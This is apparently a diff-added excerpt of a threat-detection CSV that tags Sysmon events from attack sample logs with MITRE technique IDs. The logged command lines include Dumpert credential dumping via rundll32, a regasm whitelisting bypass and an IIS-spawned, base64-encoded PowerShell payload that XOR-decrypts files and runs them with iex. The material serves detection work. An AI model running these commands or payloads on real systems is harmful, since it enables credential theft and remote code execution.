+ SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C
+ ECAD0485-8897-5D0C-0000-0010A2FA1C00
+ 3964
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"Found User (insecurebank\Administrator) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 238378
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ alice.insecurebank.local
+
+
+
+
+
+ 2019-06-21 07:35:50.093
+ ECAD0485-88D6-5D0C-0000-001007AA1D00
+ 1568
+ C:\Windows\System32\rundll32.exe
+ 6.3.9600.17415 (winblue_r4.141028-1500)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump
+ C:\Users\administrator\Desktop\x64\
+ insecurebank\Administrator
+ ECAD0485-87E3-5D0C-0000-0020266A0F00
+ 0xf6a26
+ 2
+ High
+ SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C
+ ECAD0485-8897-5D0C-0000-0010A2FA1C00
+ 3964
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
+[ T1059 ] wscript or cscript runing script,1567169648.171875,2019-08-30T16:54:08.171875+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript c:\ProgramData\memdump.vbs notepad.exe) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (C:\Windows\System32\cmd.exe) in directory : ( C:\Windows\system32\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 32151
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-30 12:54:07.823
+ 747F3D96-1C6F-5D69-0000-0010323C1F00
+ 2576
+ C:\Windows\System32\cscript.exe
+ 5.812.10240.16384
+ Microsoft ® Console Based Script Host
+ Microsoft ® Windows Script Host
+ Microsoft Corporation
+ cscript c:\ProgramData\memdump.vbs notepad.exe
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-1B6A-5D69-0000-0020E5810E00
+ 0xe81e5
+ 1
+ High
+ SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC
+ 747F3D96-1B6C-5D69-0000-00106F060F00
+ 2128
+ C:\Windows\System32\cmd.exe
+ C:\Windows\System32\cmd.exe
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436014.411034,2019-07-30T01:33:34.411034+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4922
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:34.216
+ 747F3D96-662E-5D3F-0000-001011038900
+ 6020
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556380674.165738,2019-04-27T19:57:54.165738+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c del /q "C:\Users\IEUser\Downloads\Flash_update.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6622
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1059,technique_name=Command-Line Interface
+ 2019-04-27 15:57:54.087
+ 365ABB72-7C02-5CC4-0000-0010FD6E0C00
+ 3188
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\cmd.exe" /c del /q "C:\Users\IEUser\Downloads\Flash_update.exe"
+ C:\Users\IEUser\AppData\Roaming\
+ IEWIN7\IEUser
+ 365ABB72-7AB1-5CC4-0000-0020BEF40000
+ 0xf4be
+ 1
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-7C01-5CC4-0000-00102B3E0C00
+ 2680
+ C:\Users\IEUser\Downloads\Flash_update.exe
+ "C:\Users\IEUser\Downloads\Flash_update.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1112] process updating fDenyTSConnections or UserAuthentication registry key values,1552853889.282593,2019-03-18T00:18:09.282593+04:00,,Threat,High,[T1112] process updating fDenyTSConnections or UserAuthentication registry key values,13,"
+
+
+
+
+ 13
+ 2
+ 4
+ 13
+ 0
+ 0x8000000000000000
+
+
+ 5267
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC04.example.corp
+
+
+
+
+
+ SetValue
+ 2019-03-17 20:18:09.272
+ 365ABB72-AB70-5C8E-0000-0010DF1F0A00
+ 3700
+ C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe
+ HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections
+ DWORD (0x00000000)
+
+",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
+[ T1086 ] Powershell with Suspicious Argument,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,Critical,"Found User (IIS APPPOOL\DefaultAppPool) run Suspicious PowerShell commands that include ( -enc , -noni ,-noni,-nop,powershell,\Windows\System32,ls, -t , -w ) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==) and Parent Image :C:\Windows\System32\inetsrv\w3wp.exe , Parent CommandLine (c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20) in directory : ( C:\Windows\Temp\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5875
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:28:42.700
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
+ 365ABB72-3251-5CEB-0000-00109E06E100
+ 748
+ C:\Windows\System32\inetsrv\w3wp.exe
+ c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1003 ] Credential Dumping ImageLoad,1555606693.74034,2019-04-18T20:58:13.740340+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"
+
+
+
+
+ 7
+ 3
+ 4
+ 7
+ 0
+ 0x8000000000000000
+
+
+ 20
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1003,technique_name=Credential Dumping
+ 2019-04-18 16:58:13.560
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ C:\Windows\System32\hid.dll
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Hid User Library
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE
+ true
+ Microsoft Windows
+ Valid
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+Detect IIS/Exchange Exploitation,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) and commandline ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5875
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:28:42.700
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAY